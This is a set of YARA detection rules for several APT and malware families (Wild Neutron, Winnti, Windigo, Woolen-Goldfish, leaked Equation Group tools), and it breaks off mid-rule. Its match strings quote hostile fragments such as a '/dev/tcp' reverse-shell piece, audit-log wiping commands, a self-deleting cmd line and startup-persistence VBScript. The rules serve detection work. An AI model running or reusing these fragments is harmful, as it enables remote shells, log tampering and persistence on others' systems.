$s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "RtlUpd.EXE" fullword wide /* score: '20.00' */ $s2 = "RtlUpd.exe" fullword wide /* score: '20.00' */ $s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s6 = "Key Usage" fullword ascii /* score: '12.00' */ $s7 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ condition: uint16(0) == 0x5a4d and filesize < 1240KB and all of them } rule WildNeutron_Sample_5 { meta: description = "Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206" strings: $s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s4 = "sha-1WithRSAEncryption" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */ $s5 = "Postal code" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.00' */ $s6 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */ $s7 = "Key Usage" fullword ascii /* score: '12.00' */ $s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */ $s9 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule WildNeutron_Sample_6 { meta: description = "Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865" strings: $s0 = "mshtaex.exe" fullword wide /* score: '20.00' */ condition: uint16(0) == 0x5a4d and filesize < 310KB and all of them } rule WildNeutron_Sample_7 { meta: description = "Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c" strings: $s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '24.00' */ $s1 = "PEM_read_bio_PrivateKey failed" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */ $s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii /* score: '23.00' */ $s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */ $s4 = "clapi32.dll" fullword ascii /* score: '21.00' */ $s5 = "Connection from %s port %d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s6 = "/usr/etc/ssh_known_hosts" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s7 = "Version: %s - %s %s %s %s" fullword ascii /* score: '16.00' */ $s8 = "[-] connect()" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s9 = "/bin/sh /usr/etc/sshrc" fullword ascii /* score: '12.42' */ $s10 = "kexecdhs.c" fullword ascii /* score: '12.00' */ $s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii /* score: '11.00' */ condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule WildNeutron_Sample_8 { meta: description = "Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" strings: $x1 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $x2 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */ $x3 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */ $x4 = "cmdcmdline" fullword wide /* score: '11.00' */ $x5 = "Invalid input handle!!!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s1 = "Process %d terminated" fullword wide /* PEStudio Blacklist: strings */ /* score: '24.00' */ $s2 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */ $s3 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */ $s4 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */ $s5 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s6 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */ $s7 = ") -%s-> %s (" fullword ascii /* score: '14.00' */ $s8 = "cmdextversion" fullword wide /* score: '14.00' */ $s9 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s10 = "\"%s\" /K %s" fullword wide /* score: '11.02' */ $s11 = "Error setting %s (%s)" fullword wide /* score: '11.00' */ $s12 = "DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s13 = "Failed to build full directory path" fullword wide /* score: '10.00' */ $s14 = "DEBUG: Cannot allocate memory for ptrFileArray!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.00' */ $s15 = "%-8s %-3s %*s %s %s" fullword wide /* score: '8.00' */ $s16 = " %%%c in (%s) do " fullword wide /* score: '8.00' */ condition: uint16(0) == 0x5a4d and filesize < 1677KB and 2 of ($x*) and 6 of ($s*) } rule WildNeutron_Sample_9 { meta: description = "Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e" strings: $s0 = "http://get.adobe.com/flashplayer/" fullword wide /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s1 = "xxxxxxxxxxxxxxxxxxxx" fullword wide /* reversed goodware string 'xxxxxxxxxxxxxxxxxxxx' */ /* score: '19.00' */ $s4 = " Player Installer/Uninstaller" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.42' */ $s5 = "Adobe Flash Plugin Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.00' */ $s6 = "uSOFTWARE\\Adobe" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.42' */ $s11 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */ $s12 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ $s13 = "%d -> %d" fullword wide /* score: '7.00' */ condition: uint16(0) == 0x5a4d and filesize < 500KB and all of them } rule WildNeutron_Sample_10 { meta: description = "Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7" strings: $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '46.00' */ $s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii /* PEStudio Blacklist: strings */ /* score: '37.00' */ $s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */ $s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */ $s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */ $x1 = "wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '26.00' */ $x2 = "dpcore16t.dll" fullword ascii /* score: '21.00' */ $x3 = "mspool.dll" fullword ascii /* score: '21.00' */ $x4 = "msvcse.exe" fullword ascii /* score: '20.00' */ $x5 = "mshtaex.exe" fullword wide /* score: '20.00' */ $x6 = "iastor32.exe" fullword ascii /* score: '20.00' */ $y1 = "Installer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '25.00' */ $y2 = "Info: Process %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '21.00' */ $y3 = "Error: GetFileTime %s 0x%x" fullword ascii /* score: '17.00' */ $y4 = "Install succeeded" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $y5 = "Error: RegSetValueExA 0x%x" fullword ascii /* score: '9.00' */ condition: uint16(0) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ($s*) and 1 of ($x*) and 3 of ($y*))) } /* Super Rules ------------------------------------------------------------- */ rule WildNeutron_javacpl { meta: description = "Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 super_rule = 1 hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9" hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92" hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a" strings: $x1 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */ $s0 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */ $s1 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */ $s2 = "http://www.java.com/en/download/installed.jsp?detect=jre" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */ $s3 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $s4 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */ $s6 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */ $s7 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */ $s8 = "Invalid input handle!!!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */ $s9 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */ $s10 = ") -%s-> %s (" fullword ascii /* score: '14.00' */ $s11 = "cmdextversion" fullword wide /* score: '14.00' */ $s12 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */ $s13 = "\"%s\" /K %s" fullword wide /* score: '11.02' */ $s14 = "Error setting %s (%s)" fullword wide /* score: '11.00' */ $s16 = "cmdcmdline" fullword wide /* score: '11.00' */ $s39 = "2008R2" fullword ascii /* PEStudio Blacklist: os */ /* score: '8.00' */ condition: uint16(0) == 0x5a4d and filesize < 1677KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ // Operation Windigo yara rules // For feedback or questions contact us at: windigo@eset.sk // https://github.com/eset/malware-ioc/ // // These yara rules are provided to the community under the two-clause BSD // license as follows: // // Copyright (c) 2014, ESET // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // rule onimiki { meta: description = "Linux/Onimiki malicious DNS server" malware = "Linux/Onimiki" operation = "Windigo" author = "Olivier Bilodeau <bilodeau@eset.com>" created = "2014-02-06" reference = "http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf" contact = "windigo@eset.sk" source = "https://github.com/eset/malware-ioc/" license = "BSD 2-Clause" strings: // code from offset: 0x46CBCD $a1 = {43 0F B6 74 2A 0E 43 0F B6 0C 2A 8D 7C 3D 00 8D} $a2 = {74 35 00 8D 4C 0D 00 89 F8 41 F7 E3 89 F8 29 D0} $a3 = {D1 E8 01 C2 89 F0 C1 EA 04 44 8D 0C 92 46 8D 0C} $a4 = {8A 41 F7 E3 89 F0 44 29 CF 29 D0 D1 E8 01 C2 89} $a5 = {C8 C1 EA 04 44 8D 04 92 46 8D 04 82 41 F7 E3 89} $a6 = {C8 44 29 C6 29 D0 D1 E8 01 C2 C1 EA 04 8D 04 92} $a7 = {8D 04 82 29 C1 42 0F B6 04 21 42 88 84 14 C0 01} $a8 = {00 00 42 0F B6 04 27 43 88 04 32 42 0F B6 04 26} $a9 = {42 88 84 14 A0 01 00 00 49 83 C2 01 49 83 FA 07} condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-10-10 Identifier: Winnti Malware */ rule Winnti_signing_cert { meta: description = "Detects a signing certificate used by the Winnti APT group" author = "Florian Roth" reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/" date = "2015-10-10" score = 75 hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61" hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672" strings: $s1 = "Guangzhou YuanLuo Technology Co." ascii $s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii $s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 700KB and 1 of them } rule Winnti_malware_Nsiproxy { meta: description = "Detects a Winnti rootkit" author = "Florian Roth" date = "2015-10-10" score = 75 hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672" hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0" hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e" hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f" hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8" strings: $x1 = "\\Driver\\nsiproxy" fullword wide $a1 = "\\Device\\StreamPortal" fullword wide $a2 = "\\Device\\PNTFILTER" fullword wide $s1 = "Cookie: SN=" fullword ascii $s2 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide $s3 = "Winqual.sys" fullword wide $s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide $s5 = "http://www.wasabii.com.tw 0" fullword ascii condition: uint16(0) == 0x5a4d and $x1 and 1 of ($a*) and 2 of ($s*) } rule Winnti_malware_UpdateDLL { meta: description = "Detects a Winnti malware - Update.dll" author = "Florian Roth" reference = "VTI research" date = "2015-10-10" score = 75 hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016" hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a" hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58" hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a" strings: $c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii $c2 = "AHDNEAFE1.sys" fullword ascii $c3 = "SOTEFEHJ3.sys" fullword ascii $c4 = "MainSYS64.sys" fullword ascii $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide $s2 = "Update.dll" fullword ascii $s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide $s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide $s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide $s6 = "\\??\\pipe\\usbpcg%d" fullword wide $s7 = "\\??\\pipe\\usbpcex%d" fullword wide $s8 = "HOST: %s" fullword ascii $s9 = "$$$--Hello" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and ( ( 1 of ($c*) and 3 of ($s*) ) or all of ($s*) ) } rule Winnti_malware_FWPK { meta: description = "Detects a Winnti malware - FWPKCLNT.SYS" author = "Florian Roth" reference = "VTI research" date = "2015-10-10" score = 75 hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c" hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7" hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368" strings: $s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" fullword wide $s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii $s2 = "FWPKCLNT.SYS" fullword ascii $s3 = "Port Layer" fullword wide $s4 = "%x->%x, icmp type %d, code %d" fullword ascii $s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" fullword wide $s6 = "\\Ndi\\Interfaces" fullword wide $s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" fullword wide $s8 = "Bad packet" fullword ascii $s9 = "\\BaseNamedObjects\\EKV0000000000" fullword wide $s10 = "%x->%x" fullword ascii $s11 = "IPInjectPkt" fullword ascii /* Goodware String - occured 6 times */ condition: uint16(0) == 0x5a4d and filesize < 642KB and all of them } rule Winnti_malware_StreamPortal_Gen { meta: description = "Detects a Winnti malware - Streamportal" author = "Florian Roth" reference = "VTI research" date = "2015-10-10" score = 75 hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e" hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672" hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f" strings: $s0 = "Proxies destination address/port for TCP" fullword wide $s3 = "\\Device\\StreamPortal" fullword wide $s4 = "Transport-Data Proxy Sub-Layer" fullword wide $s5 = "Cookie: SN=" fullword ascii $s6 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide $s17 = "NTOSKRNL.EXE" fullword wide /* Goodware String - occured 4 times */ $s19 = "FwpsReferenceNetBufferList0" fullword ascii /* Goodware String - occured 5 times */ condition: uint16(0) == 0x5a4d and filesize < 275KB and all of them } rule WinntiPharma { meta: author = "Jose Ramon Palanco" copyright = "Drainware, Inc." date = "2015-06-23" description = "Backdoor Win64 Winnti Pharma" ref = "https://securelist.com/blog/research/70991/games-are-over/" strings: $s0 = "Cookie: SN=" $s1 = "{3ec05b4a-ea88-1378-3389-66706ba27600}" $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}" $s3 = "master secret" $s4 = "MyEngineNetEvent" condition: all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule WoolenGoldfish_Sample_1 { meta: description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ" author = "Florian Roth" reference = "http://goo.gl/NpJpVZ" date = "2015/03/25" score = 60 hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a" strings: $s1 = "Cannot execute (%d)" fullword ascii $s16 = "SvcName" fullword ascii condition: all of them } rule WoolenGoldfish_Generic_1 { meta: description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ" author = "Florian Roth" reference = "http://goo.gl/NpJpVZ" date = "2015/03/25" score = 90 super_rule = 1 hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3" hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e" hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475" strings: $x0 = "Users\\Wool3n.H4t\\" $x1 = "C-CPP\\CWoolger" $x2 = "NTSuser.exe" fullword wide $s1 = "107.6.181.116" fullword wide $s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword $s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword $s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword $s6 = "wlg.dat" fullword $s7 = "woolger" fullword wide $s8 = "[Enter]" fullword $s9 = "[Control]" fullword condition: ( 1 of ($x*) and 2 of ($s*) ) or ( 6 of ($s*) ) } rule WoolenGoldfish_Generic_2 { meta: description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ" author = "Florian Roth" reference = "http://goo.gl/NpJpVZ" date = "2015/03/25" score = 90 hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f" hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a" hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8" hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564" strings: $s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii condition: all of them } rule WoolenGoldfish_Generic_3 { meta: description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ" author = "Florian Roth" reference = "http://goo.gl/NpJpVZ" date = "2015/03/25" score = 90 hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7" hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5" strings: $x1 = "... get header FATAL ERROR !!! %d bytes read > header_size" fullword ascii $x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide $x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii $s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii $s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide $s2 = "Attempting to unlock uninitialized lock!" fullword ascii $s4 = "unable to load kernel32.dll" fullword ascii $s5 = "index.php?c=%S&r=%x" fullword wide $s6 = "%s len:%d " fullword ascii $s7 = "Encountered error sending syscall response to client" fullword ascii $s9 = "/info.dat" fullword ascii $s10 = "Error entering thread lock" fullword ascii $s11 = "Error exiting thread lock" fullword ascii $s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii condition: ( 1 of ($x*) ) or ( 8 of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2017-04-08 Identifier: Equation Group hack tools leaked by ShadowBrokers Notice: Avoiding false positives is difficult with almost no antivirus coverage during the rule testing phase. Please report back false positives via https://github.com/Neo23x0/signature-base/issues */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_emptycriss { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91" strings: $s1 = "./emptycriss <target IP>" fullword ascii $s2 = "Cut and paste the following to the telnet prompt:" fullword ascii $s8 = "environ define TTYPROMPT abcdef" fullword ascii condition: ( filesize < 50KB and 1 of them ) } rule EquationGroup_scripme { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file scripme" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a" strings: $x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii $x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii $x3 = "$ENV{EXPLOIT_SCRIPME}" ascii $x4 = "$opetc/scripme.override" ascii condition: ( filesize < 30KB and 1 of them ) } rule EquationGroup_cryptTool { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2" strings: $s1 = "The encryption key is " fullword ascii $s2 = "___tempFile2.out" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EquationGroup_dumppoppy { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719" strings: $x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii $x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii $l1 = "End of $destfile determined by \"^Connection closed by foreign host" condition: ( filesize < 20KB and 1 of them ) } rule EquationGroup_Auditcleaner { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626" strings: $x1 = "> /var/log/audit/audit.log; rm -f ." ascii $x2 = "Pastables to run on target:" ascii $x3 = "cp /var/log/audit/audit.log .tmp" ascii $l1 = "Here is the first good cron session from" fullword ascii $l2 = "No need to clean LOGIN lines." fullword ascii condition: ( filesize < 300KB and 1 of them ) } rule EquationGroup_reverse_shell { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826" strings: $s1 = "sh >/dev/tcp/" ascii $s2 = " <&1 2>&1" fullword ascii 